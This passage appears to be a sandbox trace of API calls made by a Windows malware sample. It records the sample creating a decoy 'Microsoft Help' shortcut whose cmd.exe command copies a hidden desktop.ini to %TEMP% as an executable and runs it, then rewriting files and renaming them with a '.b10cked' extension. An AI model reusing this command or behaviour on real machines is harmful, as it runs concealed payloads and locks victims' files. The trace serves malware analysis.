lpWideCharStr="\x73\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0195.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0195.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x30\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0195.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x31\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0195.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: 
lpWideCharStr="\x35\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0195.555] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6d\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0195.555] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0195.555] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0195.555] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0195.556] CharUpperBuffW (in: lpsz="explorer.exe \"Microsoft Help\" & type \"Microsoft Help\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x6d | out: lpsz="EXPLORER.EXE \"MICROSOFT HELP\" & TYPE \"MICROSOFT HELP\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x6d [0195.556] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0195.556] CharUpperBuffW (in: lpsz="explorer.exe \"Microsoft Help\" & type \"Microsoft Help\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x6e | out: lpsz="EXPLORER.EXE \"MICROSOFT HELP\" & TYPE \"MICROSOFT HELP\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x6e [0195.556] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0195.556] CoInitialize (pvReserved=0x0) returned 0x0 [0195.556] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, 
riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0195.557] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0195.557] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0195.557] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0195.559] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Microsoft Help\" & type \"Microsoft Help\\desktop.ini\" > \"%TEMP%\\7Nsn015m.exe\" && \"%TEMP%\\7Nsn015m.exe\"") returned 0x0 [0195.559] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0195.559] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0195.559] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0195.559] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft Help.lnk", fRemember=0) returned 0x0 [0195.565] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0195.565] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0195.565] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0195.565] CoUninitialize () [0195.566] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.566] ReleaseMutex (hMutex=0xf8) returned 1 [0195.566] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.566] ReleaseMutex (hMutex=0xf8) 
returned 1 [0195.566] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.566] ReleaseMutex (hMutex=0xf8) returned 1 [0195.566] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.566] ReleaseMutex (hMutex=0xf8) returned 1 [0195.566] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MKWD_K.HxW" (normalized: "c:\\users\\all users\\microsoft help\\hx_1033_mkwd_k.hxw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0195.566] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.566] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.566] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25235575940) returned 1 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x35c8 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.567] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.568] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.568] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.568] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.568] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35c8 [0195.568] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.568] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 
0x30e0 [0195.568] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0195.569] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0195.569] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0195.569] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x35c8 [0195.569] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0195.569] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0195.569] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0195.569] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x35c8 [0195.570] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0195.570] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0195.570] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1ae3, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1ae3, lpOverlapped=0x0) returned 1 [0195.570] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0195.570] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1ae3, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1ae3, lpOverlapped=0x0) returned 1 [0195.570] SetFilePointer (in: hFile=0x120, lDistanceToMove=-6883, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ae5 [0195.570] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1ae3, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1ae3, lpOverlapped=0x0) returned 1 [0195.571] SetFilePointer (in: hFile=0x120, lDistanceToMove=-6883, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1ae5 [0195.571] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1ae3, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1ae3, lpOverlapped=0x0) returned 1 [0195.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx_1033_MKWD_K.HxW", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0195.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hx_1033_MKWD_K.HxW", cchWideChar=18, lpMultiByteStr=0x1328794, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hx_1033_MKWD_K.HxW", lpUsedDefaultChar=0x0) returned 18 [0195.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x35c8 [0195.575] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, 
nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0195.575] CloseHandle (hObject=0x120) returned 1 [0195.576] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MKWD_K.HxW", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW") returned 0x27 [0195.576] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0195.577] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_K.HxW.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_K.HxW.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xc30, dwThreadId=0xbfc)) returned 1 [0195.578] CloseHandle (hObject=0x1b4) returned 1 [0195.578] CloseHandle (hObject=0x120) returned 1 [0195.578] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0195.578] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: 
lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0195.578] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0195.578] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.578] ReleaseMutex (hMutex=0xf8) returned 1 [0195.578] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.578] ReleaseMutex (hMutex=0xf8) returned 1 [0195.578] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.578] ReleaseMutex (hMutex=0xf8) returned 1 [0195.578] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0195.578] ReleaseMutex (hMutex=0xf8) returned 1 [0195.578] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MKWD_NamedURL.HxW" (normalized: "c:\\users\\all users\\microsoft help\\hx_1033_mkwd_namedurl.hxw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.579] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25236844622) returned 1 [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.579] SetFilePointer (in: hFile=0x120, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.579] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x35ca [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x35ca [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0195.580] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
